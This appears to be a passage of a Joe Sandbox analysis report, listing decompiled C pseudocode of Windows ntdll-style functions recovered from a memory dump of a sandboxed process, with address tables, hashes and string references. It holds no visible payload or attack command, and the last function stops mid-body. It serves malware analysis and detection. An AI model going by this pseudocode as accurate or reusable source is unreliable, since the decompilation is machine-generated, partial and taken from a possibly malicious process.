0x046635a5
0x0466366b
0x0466366b
0x0466366d
0x04663672
0x04663679
0x04663685
0x0466368d
0x0466369d
0x046636a7
0x046636b8
0x046636c6
0x046636c7
0x046636dc
0x046636e1
0x046636e7
0x046636e9
0x046636e9
0x04663703
0x04663703
0x046635b5
0x046635c0
0x046635c4
0x00000000
0x00000000
0x046635ca
0x046635d7
0x046635e2
0x046635e6
0x046635e8
0x046635f5
0x046635fa
0x04663603
0x04663604
0x04663609
0x0466360a
0x04663612
0x04663613
0x0466361e
0x04663622
0x04663628
0x0466362f
0x0466362f
0x04663636
0x04663638
0x0466363b
0x04663642
0x04663642
0x04663636
0x04663657
0x04663657
0x0466365c
0x04663662
0x04663669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0466358F

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID: InitializeThunk
String ID: BinaryHash
API String ID: 2994545307-2202222882
Opcode ID: 6d52272fa7d1308046a6fb511257e12773fd21f0ae80d9a02da49d9658c638e1
Instruction ID: 908fd8bed006a7a9374c970068afb12064f8fb337425b964bed61f4862955ee8
Opcode Fuzzy Hash: 6d52272fa7d1308046a6fb511257e12773fd21f0ae80d9a02da49d9658c638e1
Instruction Fuzzy Hash: 96413AF1D0152DAFEB21DA50CD81FDEB77C9B44718F0045A9EA09A7241EB307E888F99

Uniqueness

Uniqueness Score: -1.00%

Function 046B05AC Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E046B05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E046B07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E04629730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E046AA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E046AA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E046B1293(_t79, _v40, E046B07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E04607D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E046A138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x046b05c5
0x046b05ca
0x046b05d3
0x046b06db
0x046b06db
0x046b06dd
0x046b06e3
0x046b06e3
0x046b05dd
0x046b05e7
0x046b05f6
0x046b0600
0x046b0607
0x046b0610
0x046b0615
0x046b061a
0x046b061c
0x046b061e
0x046b0624
0x046b0625
0x046b0627
0x046b0628
0x046b0631
0x046b0640
0x046b064d
0x046b0654
0x046b0654
0x046b0631
0x046b066d
0x046b0674
0x00000000
0x00000000
0x046b0692
0x046b069e
0x046b06b0
0x046b06a0
0x046b06a9
0x046b06a9
0x046b06b8
0x046b06d6
0x046b06d6
0x00000000

Strings

`, xrefs: 046B0633

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 22ebfe20bf20de0abc2fa8f47ef6e02b0b986275b8ae1c2256216594d7962c62
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: F431E0327003056BE720DE24CD85FDB7B99ABC4758F044229FA98AB280F670F954CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 04663884 Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E04663884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E04629650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L04604620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E04629650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x04663893
0x04663896
0x04663899
0x0466389f
0x046638a0
0x046638a4
0x046638a9
0x046638ac
0x046638ad
0x046638ae
0x046638af
0x046638b1
0x046638b4
0x046638bb
0x046638bc
0x046638bd
0x046638c4
0x046638c8
0x046638ca
0x046638ca
0x046638d5
0x0466393e
0x04663940
0x04663942
0x04663952
0x04663954
0x04663961
0x04663961
0x04663967
0x0466396e
0x0466396e
0x04663947
0x0466394c
0x00000000
0x0466394c
0x046638ea
0x046638ee
0x046638f8
0x046638f9
0x046638ff
0x04663900
0x04663902
0x04663903
0x0466390b
0x0466390f
0x04663950
0x00000000
0x04663950
0x04663915
0x0466391d
0x0466391d
0x04663922
0x04663926
0x00000000
0x04663928
0x0466392b
0x0466392b
0x04663935
0x04663937
0x04663937
0x00000000
0x04663935
0x04663926
0x046638f0
0x00000000

Strings

BinaryName, xrefs: 046638B4

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID: InitializeThunk
String ID: BinaryName
API String ID: 2994545307-215506332
Opcode ID: bf6a97d9fa943a85050fb0b7c716d2e307c30e330404a2cf0931d0eb57710f73
Instruction ID: aa598d30bcd853732af22e3033d50aa714fd14ee1528411c836739efa1f45263
Opcode Fuzzy Hash: bf6a97d9fa943a85050fb0b7c716d2e307c30e330404a2cf0931d0eb57710f73
Instruction Fuzzy Hash: 0031F672A00519AFEB25DE59C945E6BB7B4EB80720F014229ED16A7740F630BE40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0461D294 Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0461D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x46dd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E04604120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0462B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E046298D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E046295D0();
					L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x0461d29c
0x0461d2a6
0x0461d2b1
0x0461d2b5
0x0461d2b6
0x0461d2bc
0x0461d2bd
0x0461d2be
0x0461d2bf
0x0461d2c2
0x0461d2c4
0x0461d2cc
0x0461d384
0x0461d34b
0x0461d34f
0x0461d350
0x0461d351
0x0461d35c
0x0461d35c
0x0461d2d6
0x0461d2da
0x0461d2e1
0x0461d361
0x0461d369
0x0461d36d
0x0461d2e3
0x0461d2e3
0x0461d2e3
0x0461d2e5
0x0461d2ed
0x0461d2f5
0x0461d2fa
0x0461d302
0x0461d303
0x0461d30b
0x0461d30f
0x0461d313
0x0461d318
0x0461d31c
0x0461d320
0x0461d379
0x0461d37d
0x00000000
0x00000000
0x0465affe
0x0465b001
0x0465b011
0x00000000
0x0461d322
0x0461d322
0x0461d330
0x0461d337
0x0461d35d
0x0461d339
0x0461d33f
0x0461d38c
0x0461d38c
0x0461d33f
0x0461d349
0x00000000
0x0461d349

Strings

@, xrefs: 0461D303

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 76419ab017c8a15971c8d14e5755f04d7d817adf3d04e1814730e47fd98108ea
Instruction ID: 8f08a8122be1bf239b99c16db16019cffd756e47c8200c727debc2ee34df7c20
Opcode Fuzzy Hash: 76419ab017c8a15971c8d14e5755f04d7d817adf3d04e1814730e47fd98108ea
Instruction Fuzzy Hash: 333195B1648705AFD311DF28C98095BBBE8EB86754F04092EF99493360F639FD05DB92

Uniqueness

Uniqueness Score: -1.00%

Function 045F1B8F Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E045F1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0462BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0462A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0462A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L04604620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x045f1b8f
0x045f1b9a
0x045f1b9c
0x045f1b9e
0x045f1ba3
0x04647010
0x04647010
0x00000000
0x045f1ba9
0x045f1ba9
0x045f1bae
0x00000000
0x045f1bc5
0x045f1bca
0x045f1bcf
0x045f1bd0
0x045f1bd1
0x045f1bd2
0x045f1bd6
0x045f1bdc
0x045f1be0
0x04646ffc
0x04647000
0x00000000
0x04647006
0x04647009
0x04647009
0x045f1be6
0x045f1bec
0x045f1c0b
0x045f1c0b
0x045f1c0c
0x045f1c11
0x045f1c12
0x045f1c15
0x045f1c1b
0x045f1c1f
0x045f1c31
0x045f1c33
0x04647026
0x04647026
0x045f1c21
0x045f1c24
0x045f1c24
0x045f1bee
0x045f1bee
0x045f1bf2
0x045f1c3a
0x045f1bf4
0x045f1bf4
0x045f1c05
0x045f1c05
0x045f1c09
0x045f1c3e
0x00000000
0x00000000
0x00000000
0x045f1c09
0x045f1bec
0x045f1be0
0x045f1bae
0x045f1c2e

Strings

WindowsExcludedProcs, xrefs: 045F1BC5

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 1830dde1335a408b98eac7fc253c41ae2d8a45b90b001bc79e4e1c096edf8700
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: C621B676601928EBDB219E958D40F5B7769FB81B55F054825EA049B200F631FD00ABA1

Uniqueness

Uniqueness Score: -1.00%

Function 0460F716 Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0460F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x0460f71d
0x0460f722
0x0460f726
0x04654770
0x0460f765
0x0460f769
0x0460f769
0x0460f732
0x0465477a
0x00000000
0x0465477a
0x0460f738
0x0460f73a
0x0460f73c
0x0460f73f
0x0460f746
0x0460f778
0x0460f7a9
0x0460f7a9
0x0460f754
0x0460f75a
0x0460f75d
0x0460f75f
0x0460f761
0x0460f76f
0x0460f771
0x0460f771
0x0460f76f
0x0460f763
0x00000000
0x0460f763
0x0460f77d
0x0460f7a3
0x0460f7a5
0x00000000
0x0460f7a5
0x0460f77f
0x0460f782
0x0460f784
0x0460f786
0x00000000
0x00000000
0x00000000
0x0460f788
0x0460f748
0x0460f74d
0x0460f78d
0x0460f793
0x0460f7b7
0x0460f7bc
0x00000000
0x0460f7bc
0x0460f798
0x00000000
0x00000000
0x0460f79d
0x0460f7b0
0x00000000
0x0460f7b0
0x0460f79f
0x00000000
0x0460f74f
0x0460f74f
0x00000000
0x0460f74f

Strings

Actx , xrefs: 0460F73F

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: f2e800d7555a48601035c03776cfdbe52db9c104057066cf4d05deb0579b2186
Instruction ID: ec95d59ae5611cbadb5ee0d00c1322ceb10ecaccf2c5df802dffbe76f714001e
Opcode Fuzzy Hash: f2e800d7555a48601035c03776cfdbe52db9c104057066cf4d05deb0579b2186
Instruction Fuzzy Hash: 6A117C353086028BEB3C8E19A4907277295EBA5724F24C52AE861CB3D1FAE0F8429342

Uniqueness

Uniqueness Score: -1.00%

Function 04698DF1 Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E04698DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x46c0d50);
				E0463D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E04675720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0463DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0463DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0463D130(_t34, _t39, _t40);
			}

0x04698df1
0x04698df1
0x04698df1
0x04698df1
0x04698df1
0x04698df1
0x04698df3
0x04698df8
0x04698dfd
0x04698e00
0x04698e0e
0x04698e2a
0x04698e36
0x04698e38
0x04698e3c
0x04698e46
0x04698e46
0x04698e36
0x04698e50
0x04698e56
0x04698e59
0x04698e5c
0x04698e60
0x04698e67
0x04698e6d
0x04698e73
0x04698e74
0x04698eb1
0x04698ebd

Strings

Critical error detected %lx, xrefs: 04698E21

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 3f4231a262ba3a9883db2859bf608abe4776147af3ccece869968f320bde3b06
Instruction ID: 1d3e8a0d41aedb2ada45e93bf7287a69ff5b6768b5a98718c8dab0175ce11cb3
Opcode Fuzzy Hash: 3f4231a262ba3a9883db2859bf608abe4776147af3ccece869968f320bde3b06
Instruction Fuzzy Hash: 18115775D10348DBEF24DFA8850579CBBF4AB05315F20425ED029AB281E3742A02CF18

Uniqueness

Uniqueness Score: -1.00%

Function 0467FF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0467FF60

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: cbf4dde63023353870acd155f2ef03d3abdb87172272075e4911f487628bd1d1
Instruction ID: 6de211e618d3dd0f24754dfcaf42318f62e29946ffb0accccf21262f83701dd0
Opcode Fuzzy Hash: cbf4dde63023353870acd155f2ef03d3abdb87172272075e4911f487628bd1d1
Instruction Fuzzy Hash: 8D11ED71910584EFEB26EF50CD48FA8B7B2FF08719F148048E1096B6A0EB3DB940DB64

Uniqueness

Uniqueness Score: -1.00%

Function 046B5BA5 Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E046B5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x46c1178);
				E0463D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E046B4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0462D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E046B5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
